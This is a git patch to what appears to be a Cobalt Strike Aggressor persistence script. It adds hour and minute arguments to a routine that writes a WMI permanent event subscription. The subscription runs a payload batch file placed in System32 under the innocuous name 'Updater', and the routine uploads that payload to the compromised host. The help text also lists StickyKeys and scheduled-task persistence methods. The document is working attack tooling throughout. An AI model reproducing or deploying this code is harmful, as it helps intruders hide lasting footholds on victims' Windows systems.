From 78ffe30626063255641db67ef0b1a98d11bda521 Mon Sep 17 00:00:00 2001
From: tophertimzen <c.timzen@gmail.com>
Date: Tue, 21 Mar 2017 18:47:11 -0400
Subject: [PATCH] Added arg6 and arg7 to addWMIDaily() for finer control on
 persistence

---
 persistence.cna | 16 +++++++++++++---
 1 file changed, 13 insertions(+), 3 deletions(-)

diff --git a/persistence.cna b/persistence.cna
index 6f52d8f..ac787d9 100644
--- a/persistence.cna
+++ b/persistence.cna
@@ -33,7 +33,7 @@ alias persistence {
                     addWMIOnStart($1,$2,$3,$4,$5,$6);
                 }
                 else if ($4 eq "Daily"){
-                    addWMIDaily($1,$2,$3,$4,$5,$6);
+                    addWMIDaily($1,$2,$3,$4,$5,$6,$7);
                 }
                 else {
                     berror($1, "Specifiy OnStart or Daily.");
@@ -441,10 +441,20 @@ sub addWMIDaily {
             $payloadName = "Updater";
             $taskName = "Updater";
         }
+        if ($6) {
+            if($7) {
+                $taskHour = $6;
+                $taskMinute = $7;
+            }
+        } 
+        else {
+            $taskHour = 13;
+            $taskMinute = 00;
+        } 
         
         $payloadPath = "C:\\Windows\\System32\\" . $payloadName . ".bat";
 
-        $powershellcmd = "\$Filter=Set-WmiInstance -Class __EventFilter -Namespace \"root\\subscription\" -Arguments @{name='" . $taskName ."';EventNameSpace='root\\CimV2';QueryLanguage=\"WQL\";Query=\"SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE TargetInstance ISA 'Win32_LocalTime' AND TargetInstance.Hour = 13 AND TargetInstance.Minute = 00 GROUP WITHIN 60\"};\$Consumer = Set-WmiInstance -Class CommandLineEventConsumer -Namespace \"root\\subscription\" -Arguments @{Name='" . $taskName . "';ExecutablePath='" . $payloadPath ."';CommandLineTemplate ='" . $payloadPath . "'};Set-WmiInstance -Namespace \"root\\subscription\" -Class __FilterToConsumerBinding -Arguments @{Filter=\$Filter;Consumer=\$Consumer};";
+        $powershellcmd = "\$Filter=Set-WmiInstance -Class __EventFilter -Namespace \"root\\subscription\" -Arguments @{name='" . $taskName ."';EventNameSpace='root\\CimV2';QueryLanguage=\"WQL\";Query=\"SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE TargetInstance ISA 'Win32_LocalTime' AND TargetInstance.Hour ='" . $taskHour ."' AND TargetInstance.Minute ='" . $taskMinute . "' GROUP WITHIN 60\"};\$Consumer = Set-WmiInstance -Class CommandLineEventConsumer -Namespace \"root\\subscription\" -Arguments @{Name='" . $taskName . "';ExecutablePath='" . $payloadPath ."';CommandLineTemplate ='" . $payloadPath . "'};Set-WmiInstance -Namespace \"root\\subscription\" -Class __FilterToConsumerBinding -Arguments @{Filter=\$Filter;Consumer=\$Consumer};";
 
         bpowershell($1,$powershellcmd);
         uploadPSpayload($1,$payloadPath);
@@ -573,7 +583,7 @@ Available methods:
     *SchTasks OnStart <payload / task name>
     *SchTasks OnLogon <payload / task name>
     *WMI OnStart <payload / task name>
-    *WMI Daily <payload / task name>
+    *WMI Daily <payload / task name> <Hour> <Minute> 
     **linkinfo
     *StickyKeys <payload / key name>